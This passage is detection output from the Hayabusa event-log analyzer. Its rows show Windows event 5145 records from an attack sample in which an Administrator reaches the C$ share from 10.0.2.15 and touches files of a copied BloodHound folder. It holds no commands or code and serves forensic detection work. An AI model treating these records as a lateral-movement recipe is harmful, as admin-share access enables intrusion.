10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash : IP Address: 